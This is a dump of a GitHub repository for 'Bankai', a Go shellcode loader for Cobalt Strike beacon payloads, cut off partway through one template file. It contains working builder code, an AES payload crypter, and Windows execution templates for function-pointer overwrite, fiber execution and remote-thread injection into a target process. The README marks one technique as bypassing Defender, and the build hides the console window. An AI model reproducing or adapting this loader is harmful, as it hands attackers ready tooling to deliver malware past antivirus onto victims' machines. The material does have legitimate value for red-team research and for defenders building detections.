├── .DS_Store ├── README.md ├── bankai.go ├── changeLogs.md ├── crypter └── crypter.go ├── go.mod ├── go.sum ├── img ├── .DS_Store ├── bankai.jpg └── cobalt.png ├── output └── sample.txt ├── process └── process.go ├── readfile └── readfile.go └── templates ├── win32_VirtualProtect.tmpl ├── win64_CreateFiber.tmpl ├── win64_CreateRemoteThread.tmpl ├── win64_CreateRemoteThreadNative.tmpl ├── win64_CreateThread.tmpl ├── win64_CreateThreadNative.tmpl ├── win64_CreateThreadpoolWait.tmpl ├── win64_EnumChildWindows.tmpl ├── win64_EnumPageFilesW.tmpl ├── win64_EnumerateLoadedModules.tmpl ├── win64_EtwpCreateEtwThread.tmpl ├── win64_RtlCreateUserThread.tmpl └── win64_Syscall.tmpl /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bigb0sss/Bankai/1623ad07a544c68655cf6c2345774091c0e90ddb/.DS_Store -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 |
3 | 4 |
5 |

6 | 7 | # Bankai 8 | Another Go shellcode loader designed to work with Cobalt Strike raw binary payload. I created this project to mainly educate myself learning Go and directly executing shellcode into the target Windows system using various techniques. 9 | 10 | Encryption - I implemented a simple payload encryption process (IV --> AES --> XOR --> Base64) that I learned while studying for [SLAE32](https://bigb0ss.medium.com/expdev-custom-go-crypter-fb8f9bac0fe8). This is mainly for protecting Cobalt Strike payload when it's moved over to the target host. The final compiled payload will include a decrypt function within. 11 | 12 | Templates - Templates are the skeleton scripts to generate a final payload per each technique. 13 | 14 | ## Installation 15 | ``` 16 | git clone https://github.com/bigb0sss/bankai.git 17 | GO111MODULE=off go build bankai.go 18 | ``` 19 | 20 | ## Usage & Example 21 | Generate a Cobalt Strike payload: 22 | 23 |

24 |
25 | 26 |
27 |

28 | 29 | ``` 30 | ./bankai -h 31 | 32 | _ _ _ 33 | | | | | (_) 34 | | |__ __ _ _ __ | | ____ _ _ 35 | | '_ \ / _' | '_ \| |/ / _' | | 36 | | |_) | (_| | | | | < (_| | | 37 | |_.__/ \__,_|_| |_|_|\_\__,_|_| 38 | [bigb0ss] 39 | 40 | [INFO] Another Go Shellcode Loader 41 | 42 | 43 | Required: 44 | -i Binary File (e.g., beacon.bin) 45 | -o Payload Output (e.g, payload.exe) 46 | -t Payload Template (e.g., win32_VirtualProtect.tmpl) 47 | -a Arch (32|64) 48 | 49 | Optional: 50 | -h Print this help menu 51 | -p PID 52 | 53 | Templates: Last update: 06/07/21 54 | +--------------------------------------+-----------+------------------+ 55 | | Techniques | PID | Bypass Defender | 56 | +--------------------------------------+-----------+------------------+ 57 | | win32_VirtualProtect.tmpl | | No | 58 | +--------------------------------------+-----------+------------------+ 59 | | win64_CreateFiber.tmpl | | No | 60 | +--------------------------------------+-----------+------------------+ 61 | | win64_CreateRemoteThreadNative.tmpl | Required | Yes | 62 | +--------------------------------------+-----------+------------------+ 63 | | win64_CreateThread.tmpl | | No | 64 | +--------------------------------------+-----------+------------------+ 65 | | win64_EtwpCreateEtwThread.tmpl | | No | 66 | +--------------------------------------+-----------+------------------+ 67 | | win64_Syscall.tmpl | | No | 68 | +--------------------------------------+-----------+------------------+ 69 | | win64_CreateThreadpoolWait.tmpl | | No | 70 | +--------------------------------------+-----------+------------------+ 71 | | win64_EnumerateLoadedModules.tmpl | | No | 72 | +--------------------------------------+-----------+------------------+ 73 | | win64_EnumChildWindows.tmpl | | No | 74 | +--------------------------------------+-----------+------------------+ 75 | | win64_CreateRemoteThread.tmpl | Required | No | 76 | +--------------------------------------+-----------+------------------+ 77 | | win64_RtlCreateUserThread.tmpl | Required | No | 78 | +--------------------------------------+-----------+------------------+ 79 | | win64_CreateThreadNative.tmpl | | No | 80 | +--------------------------------------+-----------+------------------+ 81 | 82 | Example: 83 | 84 | ./bankai -i beacon.bin -o payload.exe -t win64_CreateThread.tmpl -a 64 85 | [INFO] Key: SymE9GQBtyHL4IAq5Pm6r3b8I7PJB9l0 86 | [INFO] AES encrpyting the payload... 87 | [INFO] Arch: x64 (64-bit) 88 | [INFO] Template: win64_CreateThread.tmpl 89 | [INFO] InputFile: beacon.bin 90 | [INFO] OutputFile: payload.exe 91 | 92 | ./bankai -i beacon64.bin -o payload.exe -t win64_CreateRemoteThread.tmpl -a 64 -p 7720 93 | [INFO] Key: 3mOL2Ne5XIW4xCieiR7cPmHtw4o737Do 94 | [INFO] AES encrpyting the payload... 95 | [INFO] Arch: x64 (64-bit) 96 | [INFO] Template: win64_CreateRemoteThread.tmpl 97 | [INFO] InputFile: beacon64.bin 98 | [INFO] OutputFile: payload.exe 99 | ``` 100 | 101 | ## Credits / Acknowledgments / References 102 | All of the work is inspired and done by the following researchers/projects: 103 | * [go-shellcode](https://github.com/brimstone/go-shellcode) by brimstone 104 | * [go-shellcode](https://github.com/Ne0nd0g/go-shellcode) by Ne0nd0g 105 | * [GoPurple](https://github.com/sh4hin/GoPurple) by sh4hin 106 | * Go Template - https://dev.to/kirklewis/go-text-template-processing-181d 107 | 108 | ## Todo 109 | - [ ] Add [AlternativeShellcodeExec](https://github.com/S4R1N/AlternativeShellcodeExec) techniques that Ali and Alfaro found 110 | - [ ] Test these shellcodes with modified malleableC2 profiles 111 | - [ ] Add [BananaPhone](https://github.com/C-Sto/BananaPhone) for templates -------------------------------------------------------------------------------- /bankai.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "io" 7 | math "math/rand" 8 | "os" 9 | "os/exec" 10 | "time" 11 | 12 | "./crypter" 13 | "./process" 14 | "./readfile" 15 | ) 16 | 17 | const ( 18 | usage = ` 19 | Required: 20 | -i Binary File (e.g., beacon.bin) 21 | -o Payload Output (e.g, payload.exe) 22 | -t Payload Template (e.g., win32_VirtualProtect.tmpl) 23 | -a Arch (32|64) 24 | 25 | Optional: 26 | -h Print this help menu 27 | -p PID 28 | 29 | Templates: Last update: 06/07/21 30 | +--------------------------------------+-----------+------------------+ 31 | | Techniques | PID | Bypass Defender | 32 | +--------------------------------------+-----------+------------------+ 33 | | win32_VirtualProtect.tmpl | | No | 34 | +--------------------------------------+-----------+------------------+ 35 | | win64_CreateFiber.tmpl | | No | 36 | +--------------------------------------+-----------+------------------+ 37 | | win64_CreateRemoteThreadNative.tmpl | Required | Yes | 38 | +--------------------------------------+-----------+------------------+ 39 | | win64_CreateThread.tmpl | | No | 40 | +--------------------------------------+-----------+------------------+ 41 | | win64_EtwpCreateEtwThread.tmpl | | No | 42 | +--------------------------------------+-----------+------------------+ 43 | | win64_Syscall.tmpl | | No | 44 | +--------------------------------------+-----------+------------------+ 45 | | win64_CreateThreadpoolWait.tmpl | | No | 46 | +--------------------------------------+-----------+------------------+ 47 | | win64_EnumerateLoadedModules.tmpl | | No | 48 | +--------------------------------------+-----------+------------------+ 49 | | win64_EnumChildWindows.tmpl | | No | 50 | +--------------------------------------+-----------+------------------+ 51 | | win64_CreateRemoteThread.tmpl | Required | No | 52 | +--------------------------------------+-----------+------------------+ 53 | | win64_RtlCreateUserThread.tmpl | Required | No | 54 | +--------------------------------------+-----------+------------------+ 55 | | win64_CreateThreadNative.tmpl | | No | 56 | +--------------------------------------+-----------+------------------+ 57 | 58 | Example: 59 | 60 | ./bankai -i beacon.bin -o payload.exe -t win64_CreateThread.tmpl -a 64 61 | ` 62 | ) 63 | 64 | func banner() { 65 | banner := ` 66 | _ _ _ 67 | | | | | (_) 68 | | |__ __ _ _ __ | | ____ _ _ 69 | | '_ \ / _' | '_ \| |/ / _' | | 70 | | |_) | (_| | | | | < (_| | | 71 | |_.__/ \__,_|_| |_|_|\_\__,_|_| 72 | [bigb0ss] 73 | 74 | [INFO] Another Go Shellcode Loader 75 | ` 76 | fmt.Println(banner) 77 | } 78 | 79 | type menu struct { 80 | help bool 81 | input string 82 | output string 83 | templates string 84 | arch string 85 | pid int 86 | } 87 | 88 | func options() *menu { 89 | input := flag.String("i", "", "raw payload") 90 | output := flag.String("o", "", "payload output") 91 | templates := flag.String("t", "", "payload template") 92 | arch := flag.String("a", "", "arch") 93 | pid := flag.Int("p", 0, "pid") 94 | help := flag.Bool("h", false, "Help Menu") 95 | 96 | flag.Parse() 97 | 98 | return &menu{ 99 | help: *help, 100 | input: *input, 101 | output: *output, 102 | templates: *templates, 103 | arch: *arch, 104 | pid: *pid, 105 | } 106 | } 107 | 108 | func main() { 109 | 110 | opt := options() 111 | if opt.help { 112 | banner() 113 | fmt.Println(usage) 114 | os.Exit(0) 115 | } 116 | 117 | if opt.input == "" || opt.output == "" || opt.templates == "" || opt.arch == "" { 118 | fmt.Println(usage) 119 | os.Exit(0) 120 | } 121 | 122 | // if opt.templates == "win64_CreateRemoteThreadNative.tmpl" || opt.templates == "win64_CreateRemoteThread.tmpl" || opt.templates == "win64_RtlCreateUserThread.tmpl" && opt.pid == 0 { 123 | // fmt.Println("[ERROR] For this template, you must use PID (-p).") 124 | // os.Exit(1) 125 | // } 126 | 127 | // Bug Fix (10-24-21) - Credit: @Simon-Davies 128 | if opt.templates == "win64_CreateRemoteThreadNative.tmpl" && opt.pid == 0 || opt.templates == "win64_CreateRemoteThread.tmpl" && opt.pid == 0 || opt.templates == "win64_RtlCreateUserThread.tmpl" && opt.pid == 0 { 129 | fmt.Println("[ERROR] For this template, you must use PID (-p).") 130 | os.Exit(1) 131 | } 132 | 133 | inputFile := opt.input 134 | outputFile := opt.output 135 | tmplSelect := opt.templates 136 | arch := opt.arch 137 | pid := opt.pid 138 | 139 | // Reading shellcode from .bin 140 | shellcodeFromFile := readfile.ReadShellcode(inputFile) 141 | 142 | // Getting AES key 143 | math.Seed(time.Now().UnixNano()) 144 | key := []byte(crypter.RandKeyGen(32)) //Key Size: 16, 32 145 | fmt.Printf("[INFO] Key: %v\n", string(key)) 146 | 147 | // Payload encryption 148 | encryptedPayload := crypter.Encrypt(key, []byte(shellcodeFromFile)) 149 | fmt.Println("[INFO] AES encrpyting the payload...") 150 | 151 | // Creating an output file with entered shellcode 152 | file, err := os.Create("output/shellcode.go") 153 | if err != nil { 154 | fmt.Printf("[ERROR] %s\n", err) 155 | } 156 | defer file.Close() 157 | 158 | // Template creation with shellcode 159 | vars := make(map[string]interface{}) 160 | vars["Shellcode"] = encryptedPayload 161 | vars["Key"] = string(key) 162 | vars["Pid"] = pid 163 | r := process.ProcessFile("templates/"+tmplSelect, vars) 164 | 165 | _, err = io.WriteString(file, r) 166 | if err != nil { 167 | fmt.Println("[ERROR] Failed to create template") 168 | os.Exit(1) 169 | } 170 | 171 | // Compling the output shellcode loader 172 | cmd := exec.Command( 173 | "go", 174 | "build", 175 | "-ldflags=-s", // Using -s instructs Go to create the smallest output 176 | "-ldflags=-w", // Using -w instructs Go to create the smallest output 177 | "-ldflags=-H=windowsgui", // hide console window - (10-24-21) Credit: @Simon-Davies 178 | "-o", outputFile, 179 | "output/shellcode.go", 180 | ) 181 | 182 | archTech := "" 183 | if arch == "32" { 184 | archTech = "386" 185 | fmt.Println("[INFO] Arch: x86 (32-bit)") 186 | } else if arch == "64" { 187 | archTech = "amd64" 188 | fmt.Println("[INFO] Arch: x64 (64-bit)") 189 | } else { 190 | fmt.Println("[ERROR] Arch must be 32 or 64") 191 | os.Exit(1) 192 | } 193 | 194 | cmd.Env = append(os.Environ(), 195 | "GOOS=windows", 196 | "GOARCH="+archTech, 197 | ) 198 | 199 | cmd.Stdout = os.Stdout 200 | cmd.Stderr = os.Stderr 201 | errCmd := cmd.Run() 202 | if errCmd != nil { 203 | fmt.Println("[ERROR] Failed to compile the payload.") 204 | os.Exit(1) 205 | } 206 | 207 | fmt.Printf("[INFO] Template: %s\n", tmplSelect) 208 | fmt.Printf("[INFO] InputFile: %s\n", inputFile) 209 | fmt.Printf("[INFO] OutputFile: %s\n", outputFile) 210 | 211 | } 212 | -------------------------------------------------------------------------------- /changeLogs.md: -------------------------------------------------------------------------------- 1 | ## Change Log 2 | ### 10/24/21 3 | * Bug fix 4 | * Fixed broken `-p` flag logic & removed console output when compiling (Thanks to @Simon-Davies) 5 | 6 | ### 06/07/21 7 | * Added `win64_EnumPageFilesW.tmpl` 8 | * Added `win64_CreateRemoteThread.tmpl` 9 | * Added `win64_RtlCreateUserThread.tmpl` 10 | * Added `win64_CreateThreadNative.tmpl` 11 | 12 | ### 06/02/21 13 | * Added `win64_CreateThreadpoolWait.tmpl` 14 | * Added `win64_EnumerateLoadedModules.tmpl` 15 | * Added `win64_EnumChildWindows.tmpl` 16 | * Updated some error handling 17 | -------------------------------------------------------------------------------- /crypter/crypter.go: -------------------------------------------------------------------------------- 1 | package crypter 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "crypto/rand" 7 | "encoding/base64" 8 | "io" 9 | math "math/rand" 10 | ) 11 | 12 | func RandKeyGen(n int) string { 13 | 14 | // Random Key Generator (128 bit) 15 | var chars = []rune("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz") 16 | 17 | charSet := make([]rune, n) 18 | for i := range charSet { 19 | charSet[i] = chars[math.Intn(len(chars))] 20 | } 21 | return string(charSet) 22 | } 23 | 24 | // Encrpyt: Original Text --> Add IV --> Encrypt with Key --> Base64 Encode 25 | func Encrypt(key []byte, text []byte) string { 26 | 27 | block, err := aes.NewCipher(key) 28 | if err != nil { 29 | panic(err) 30 | } 31 | 32 | // Creating IV 33 | ciphertext := make([]byte, aes.BlockSize+len(text)) 34 | iv := ciphertext[:aes.BlockSize] 35 | if _, err := io.ReadFull(rand.Reader, iv); err != nil { 36 | panic(err) 37 | } 38 | 39 | // AES Encrpytion Process 40 | stream := cipher.NewCFBEncrypter(block, iv) 41 | stream.XORKeyStream(ciphertext[aes.BlockSize:], text) 42 | 43 | // Base64 Encode 44 | return base64.URLEncoding.EncodeToString(ciphertext) 45 | } 46 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module bankai 2 | 3 | go 1.16 4 | 5 | require ( 6 | github.com/lxn/win v0.0.0-20210218163916-a377121e959e 7 | golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b 8 | ) 9 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/lxn/win v0.0.0-20210218163916-a377121e959e h1:H+t6A/QJMbhCSEH5rAuRxh+CtW96g0Or0Fxa9IKr4uc= 2 | github.com/lxn/win v0.0.0-20210218163916-a377121e959e/go.mod h1:KxxjdtRkfNoYDCUP5ryK7XJJNTnpC8atvtmTheChOtk= 3 | golang.org/x/sys v0.0.0-20201018230417-eeed37f84f13/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 4 | golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b h1:qh4f65QIVFjq9eBURLEYWqaEXmOyqdUyiBSgaXWccWk= 5 | golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 6 | -------------------------------------------------------------------------------- /img/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bigb0sss/Bankai/1623ad07a544c68655cf6c2345774091c0e90ddb/img/.DS_Store -------------------------------------------------------------------------------- /img/bankai.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bigb0sss/Bankai/1623ad07a544c68655cf6c2345774091c0e90ddb/img/bankai.jpg -------------------------------------------------------------------------------- /img/cobalt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bigb0sss/Bankai/1623ad07a544c68655cf6c2345774091c0e90ddb/img/cobalt.png -------------------------------------------------------------------------------- /output/sample.txt: -------------------------------------------------------------------------------- 1 | <> -------------------------------------------------------------------------------- /process/process.go: -------------------------------------------------------------------------------- 1 | package process 2 | 3 | import ( 4 | "bytes" 5 | "text/template" 6 | ) 7 | 8 | func process(t *template.Template, vars interface{}) string { 9 | var tmplBytes bytes.Buffer 10 | 11 | err := t.Execute(&tmplBytes, vars) 12 | if err != nil { 13 | panic(err) 14 | } 15 | return tmplBytes.String() 16 | } 17 | 18 | func ProcessFile(fileName string, vars interface{}) string { 19 | tmpl, err := template.ParseFiles(fileName) 20 | 21 | if err != nil { 22 | panic(err) 23 | } 24 | return process(tmpl, vars) 25 | } 26 | -------------------------------------------------------------------------------- /readfile/readfile.go: -------------------------------------------------------------------------------- 1 | package readfile 2 | 3 | import ( 4 | "bufio" 5 | "encoding/hex" 6 | "fmt" 7 | "io/ioutil" 8 | "os" 9 | "strings" 10 | ) 11 | 12 | func ReadShellcode(inputFile string) string { 13 | 14 | // Write hexdump file from binary file (.bin) 15 | dumpFile := "output/shellcode.hexdump" 16 | 17 | f, err := os.Create(dumpFile) 18 | if err != nil { 19 | fmt.Printf("[ERROR] %s\n", err) 20 | } 21 | defer f.Close() 22 | 23 | content, err := ioutil.ReadFile(inputFile) 24 | if err != nil { 25 | fmt.Printf("[ERROR] %s\n", err) 26 | } 27 | 28 | binToHex := hex.Dump(content) 29 | f.WriteString(binToHex) 30 | 31 | // Read & Parse shellcode 32 | file, err := os.Open(dumpFile) 33 | 34 | if err != nil { 35 | fmt.Printf("[ERROR] %s\n", err) 36 | } 37 | 38 | scanner := bufio.NewScanner(file) 39 | scanner.Split(bufio.ScanLines) 40 | var txtlines []string 41 | 42 | for scanner.Scan() { 43 | txtlines = append(txtlines, scanner.Text()) 44 | } 45 | 46 | file.Close() 47 | 48 | shellcode := "" 49 | for _, eachline := range txtlines { 50 | column := eachline[10:58] // Stupid way to parse hexdump 51 | noSpace := strings.ReplaceAll(column, " ", "") 52 | noNewline := strings.TrimSuffix(noSpace, "\n") 53 | shellcode += noNewline 54 | } 55 | 56 | return shellcode 57 | } 58 | -------------------------------------------------------------------------------- /templates/win32_VirtualProtect.tmpl: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "crypto/aes" 7 | "crypto/cipher" 8 | "encoding/base64" 9 | "encoding/hex" 10 | "fmt" 11 | "os" 12 | "syscall" 13 | "unsafe" 14 | ) 15 | 16 | var ( 17 | kernel32dll = syscall.NewLazyDLL("kernel32.dll") 18 | procVirtualProtect = kernel32dll.NewProc("VirtualProtect") 19 | ) 20 | 21 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 22 | func Decrypt(key []byte, encryptedText string) string { 23 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 24 | 25 | block, err := aes.NewCipher(key) 26 | if err != nil { 27 | panic(err) 28 | } 29 | 30 | // Using IV 31 | iv := ciphertext[:aes.BlockSize] 32 | 33 | // Checking BlockSize = IV 34 | if len(iv) != aes.BlockSize { 35 | panic("[Error] Ciphertext is too short!") 36 | } 37 | 38 | ciphertext = ciphertext[aes.BlockSize:] 39 | 40 | // Decryption Process 41 | stream := cipher.NewCFBDecrypter(block, iv) 42 | stream.XORKeyStream(ciphertext, ciphertext) 43 | 44 | return string(ciphertext) 45 | } 46 | 47 | func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool { 48 | ret, _, _ := procVirtualProtect.Call( 49 | uintptr(lpAddress), 50 | uintptr(dwSize), 51 | uintptr(flNewProtect), 52 | uintptr(lpflOldProtect)) 53 | return ret > 0 54 | } 55 | 56 | func Execute(shellcode []byte) { 57 | f := func() {} 58 | 59 | // Change permission on f function ptr 60 | var oldPerms uint32 61 | if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldPerms)) { 62 | panic("[ERROR] Call to VirtualProtect failed!") 63 | } 64 | 65 | // Overwriting function ptr 66 | **(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&shellcode)) 67 | 68 | // Change permissions on shellcode string data 69 | var oldShellcodePerms uint32 70 | if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&shellcode))), uintptr(len(shellcode)), uint32(0x40), unsafe.Pointer(&oldShellcodePerms)) { 71 | panic("[ERROR] Call to VirtualProtect failed!") 72 | } 73 | 74 | f() 75 | } 76 | 77 | func main() { 78 | encShellcode := "{{.Shellcode}}" 79 | key := []byte("{{.Key}}") 80 | 81 | // Decrypt base64/AES to original value 82 | decShellcode := Decrypt(key, encShellcode) 83 | 84 | sc_bin, err := hex.DecodeString(decShellcode) 85 | 86 | if err != nil { 87 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 88 | os.Exit(1) 89 | } 90 | 91 | Execute(sc_bin) 92 | } -------------------------------------------------------------------------------- /templates/win64_CreateFiber.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | ntdll = windows.NewLazySystemDLL("ntdll.dll") 25 | 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | VirtualProtect = kernel32.NewProc("VirtualProtect") 28 | RtlCopyMemory = ntdll.NewProc("RtlCopyMemory") 29 | ConvertThreadToFiber = kernel32.NewProc("ConvertThreadToFiber") 30 | CreateFiber = kernel32.NewProc("CreateFiber") 31 | SwitchToFiber = kernel32.NewProc("SwitchToFiber") 32 | ) 33 | 34 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 35 | func Decrypt(key []byte, encryptedText string) string { 36 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 37 | 38 | block, err := aes.NewCipher(key) 39 | if err != nil { 40 | panic(err) 41 | } 42 | 43 | // Using IV 44 | iv := ciphertext[:aes.BlockSize] 45 | 46 | // Checking BlockSize = IV 47 | if len(iv) != aes.BlockSize { 48 | panic("[Error] Ciphertext is too short!") 49 | } 50 | 51 | ciphertext = ciphertext[aes.BlockSize:] 52 | 53 | // Decryption Process 54 | stream := cipher.NewCFBDecrypter(block, iv) 55 | stream.XORKeyStream(ciphertext, ciphertext) 56 | 57 | return string(ciphertext) 58 | } 59 | 60 | func Execute(shellcode []byte) { 61 | fiberAddr, _, errConvertFiber := ConvertThreadToFiber.Call() 62 | 63 | if errConvertFiber != nil && errConvertFiber.Error() != "The operation completed successfully." { 64 | panic("[ERROR] Call to ConvertFiber failed!") 65 | } 66 | 67 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 68 | 0, 69 | uintptr(len(shellcode)), 70 | MEM_COMMIT|MEM_RESERVE, 71 | PAGE_READWRITE, 72 | ) 73 | 74 | if errVirtualAlloc != nil && errConvertFiber.Error() != "The operation completed successfully." { 75 | panic("[ERROR] Call to VirtualAlloc failed!") 76 | } 77 | 78 | _, _, errRtlCopyMemory := RtlCopyMemory.Call( 79 | addr, 80 | (uintptr)(unsafe.Pointer(&shellcode[0])), 81 | uintptr(len(shellcode)), 82 | ) 83 | 84 | if errRtlCopyMemory != nil && errConvertFiber.Error() != "The operation completed successfully." { 85 | panic("[ERROR] Call to RtlCopyMemory failed!") 86 | } 87 | 88 | oldProtect := PAGE_READWRITE 89 | _, _, errVirtualProtect := VirtualProtect.Call( 90 | addr, 91 | uintptr(len(shellcode)), 92 | PAGE_EXECUTE_READ, 93 | uintptr(unsafe.Pointer(&oldProtect)), 94 | ) 95 | 96 | if errVirtualProtect != nil && errConvertFiber.Error() != "The operation completed successfully." { 97 | panic("[ERROR] Call to VirtualProtect failed!") 98 | } 99 | 100 | fiber, _, errCreateFiber := CreateFiber.Call( 101 | 0, 102 | addr, 103 | 0, 104 | ) 105 | 106 | if errCreateFiber != nil && errConvertFiber.Error() != "The operation completed successfully." { 107 | panic("[ERROR] Call to CreateFiber failed!") 108 | } 109 | 110 | _, _, errSwitchToFiber := SwitchToFiber.Call(fiber) 111 | 112 | if errSwitchToFiber != nil && errConvertFiber.Error() != "The operation completed successfully." { 113 | panic("[ERROR] Call to SwitchToFiber failed!") 114 | } 115 | 116 | _, _, errSwitchToFiber2 := SwitchToFiber.Call(fiberAddr) 117 | 118 | if errSwitchToFiber2 != nil && errConvertFiber.Error() != "The operation completed successfully." { 119 | panic("[ERROR] Call to SwitchToFiber failed!") 120 | } 121 | 122 | } 123 | 124 | func main() { 125 | encShellcode := "{{.Shellcode}}" 126 | key := []byte("{{.Key}}") 127 | 128 | // Decrypt base64/AES to original value 129 | decShellcode := Decrypt(key, encShellcode) 130 | 131 | 132 | shellcode, err := hex.DecodeString(decShellcode) 133 | 134 | if err != nil { 135 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 136 | os.Exit(1) 137 | } 138 | 139 | Execute(shellcode) 140 | } 141 | -------------------------------------------------------------------------------- /templates/win64_CreateRemoteThread.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | 25 | VirtualAllocEx = kernel32.NewProc("VirtualAllocEx") 26 | VirtualProtectEx = kernel32.NewProc("VirtualProtectEx") 27 | WriteProcessMemory = kernel32.NewProc("WriteProcessMemory") 28 | CreateRemoteThreadEx = kernel32.NewProc("CreateRemoteThreadEx") 29 | ) 30 | 31 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 32 | func Decrypt(key []byte, encryptedText string) string { 33 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 34 | 35 | block, err := aes.NewCipher(key) 36 | if err != nil { 37 | panic(err) 38 | } 39 | 40 | // Using IV 41 | iv := ciphertext[:aes.BlockSize] 42 | 43 | // Checking BlockSize = IV 44 | if len(iv) != aes.BlockSize { 45 | panic("[Error] Ciphertext is too short!") 46 | } 47 | 48 | ciphertext = ciphertext[aes.BlockSize:] 49 | 50 | // Decryption Process 51 | stream := cipher.NewCFBDecrypter(block, iv) 52 | stream.XORKeyStream(ciphertext, ciphertext) 53 | 54 | return string(ciphertext) 55 | } 56 | 57 | func Execute(shellcode []byte, pid int) { 58 | pHandle, errOpenProcess := windows.OpenProcess( 59 | windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, 60 | false, 61 | uint32(pid), 62 | ) 63 | if errOpenProcess != nil { 64 | panic("[ERROR] Call to OpenProcess failed!") 65 | } 66 | 67 | addr, _, errVirtualAlloc := VirtualAllocEx.Call( 68 | uintptr(pHandle), 69 | 0, 70 | uintptr(len(shellcode)), 71 | windows.MEM_COMMIT|windows.MEM_RESERVE, 72 | windows.PAGE_READWRITE, 73 | ) 74 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 75 | panic("[ERROR] Call to VirtualAllocEx failed!") 76 | } 77 | 78 | _, _, errWriteProcessMemory := WriteProcessMemory.Call( 79 | uintptr(pHandle), 80 | addr, 81 | (uintptr)(unsafe.Pointer(&shellcode[0])), 82 | uintptr(len(shellcode)), 83 | ) 84 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 85 | panic("[ERROR] Call to WriteProcessMemory failed!") 86 | } 87 | 88 | oldProtect := windows.PAGE_READWRITE 89 | 90 | _, _, errVirtualProtectEx := VirtualProtectEx.Call( 91 | uintptr(pHandle), 92 | addr, 93 | uintptr(len(shellcode)), 94 | windows.PAGE_EXECUTE_READ, 95 | uintptr(unsafe.Pointer(&oldProtect)), 96 | ) 97 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 98 | panic("[ERROR] Call to VirtualProtectEx failed!") 99 | } 100 | _, _, errCreateRemoteThreadEx := CreateRemoteThreadEx.Call( 101 | uintptr(pHandle), 102 | 0, 103 | 0, 104 | addr, 105 | 0, 106 | 0, 107 | 0, 108 | ) 109 | if errCreateRemoteThreadEx != nil && errCreateRemoteThreadEx.Error() != "The operation completed successfully." { 110 | panic("[ERROR] Call to CreateRemoteThreadEx failed!") 111 | } 112 | 113 | errCloseHandle := windows.CloseHandle( 114 | pHandle, 115 | ) 116 | if errCloseHandle != nil { 117 | panic("[ERROR] Call to CloseHandle failed!") 118 | } 119 | } 120 | 121 | func main() { 122 | encShellcode := "{{.Shellcode}}" 123 | key := []byte("{{.Key}}") 124 | pid := {{.Pid}} 125 | 126 | // Decrypt base64/AES to original value 127 | decShellcode := Decrypt(key, encShellcode) 128 | 129 | shellcode, err := hex.DecodeString(decShellcode) 130 | 131 | if err != nil { 132 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 133 | os.Exit(1) 134 | } 135 | 136 | Execute(shellcode, pid) 137 | } -------------------------------------------------------------------------------- /templates/win64_CreateRemoteThreadNative.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | 